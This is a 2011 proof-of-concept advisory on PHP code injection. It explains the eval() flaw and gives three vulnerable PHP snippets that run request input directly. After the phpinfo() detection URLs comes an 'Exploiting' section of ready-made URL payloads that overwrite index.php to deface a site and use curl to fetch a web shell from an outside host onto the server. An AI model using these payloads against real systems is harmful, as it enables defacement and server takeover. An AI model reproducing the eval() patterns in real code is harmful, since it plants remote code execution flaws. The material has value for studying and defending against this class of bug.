|===============================================================================================| |-----> [ID] : [SSB00000] | |-----> [Title] : [PoC of PHP Code Injection] | |-----> [Criticality] : [High] | |-----> [Email] : [ssbostan@gmail.com] | |-----> [Date] : [18/07/2011] | |===============================================================================================| ######################################################################################### BOF ### ### Introduction + + PCI (PHP Code Injection) is a class of vulnerability in PHP that allows an attacker to inject PHP code. + There are two types of PCI attack: + 1- Injecting PHP code into PHP code (when the application passes input to the eval() function) + 2- Injecting input into the argument of some other function (when the application passes input to a function other than eval()) + + In the first type, every PHP function is available to the attacker. + + For example: + include(), system() or any other function can be called from inside the eval()'d input. + + But + + in the second type, only the operations supported by the function that receives the input are available. + + For example: + if the source passes the input to system(), only commands can be executed, as in an RCE attack. + or + if the source passes the input to include(), only pages can be included, as in an RFI attack. + + Attention: + because every variant of the second type already has its own name (RCE, RFI, ...), the term PCI refers to the first type..!!! + + + + ### Vulnerable source codes + + We have three sample codes as proof of concept. 
+ + PoC1 (5 lines): + + <?php + $how=$_GET['how']; + $how=stripslashes($how); + eval($how); + ?> + + PoC2 (6 lines): + + <?php + $how=$_GET['how']; + $how=preg_replace_callback("/(<\?=)(.*?)\?>/si",create_function('$how','ob_start();eval("$how[2];");$return=ob_get_contents();ob_end_clean();return $return;'),$how); + $how=preg_replace_callback("/(<\?php|<\?)(.*?)\?>/si",create_function('$how','ob_start();eval("print $how[2];");$return = ob_get_contents();ob_end_clean();return $return;'),$how); + echo $how; + ?> + + PoC3 (5 lines): + + <?php + $how=$_GET['how']; + $how=stripslashes($how); + eval('?>'.$how); + ?> + + + + ### Detection + + PoC1: + http://website.com/page.php?how=phpinfo(); + + PoC2: + http://website.com/page.php?how=<? phpinfo(); ?> + (the input is only evaluated where it matches the "<? ... ?>" pattern of the preg_replace_callback() calls, so the tags are required) + + PoC3: + http://website.com/page.php?how=<? phpinfo(); + (eval('?>'.$how) starts in HTML mode, so an opening tag is required to switch back to PHP) + + Result: the server's phpinfo page is displayed. + + + + ### Exploiting + + Create a defacement page: + + http://website.com/page.php?how=$def=fopen("index.php",'w');fwrite($def,("defaced.!!!"));fclose($def); + or + http://website.com/page.php?how=<?php $def=fopen("index.php",'w');fwrite($def,("defaced.!!!"));fclose($def); ?> + or + http://website.com/page.php?how=<?php $def=fopen("index.php",'w');fwrite($def,("defaced.!!!"));fclose($def); + + Create a shell: + + http://website.com/page.php?how=system("curl http://shellcode.com/shell.txt -o shell.php"); + or + http://website.com/page.php?how=<?php system("curl http://shellcode.com/shell.txt -o shell.php"); ?> + or + http://website.com/page.php?how=<?php system("curl http://shellcode.com/shell.txt -o shell.php"); + + + + ######################################################################################### EOF ###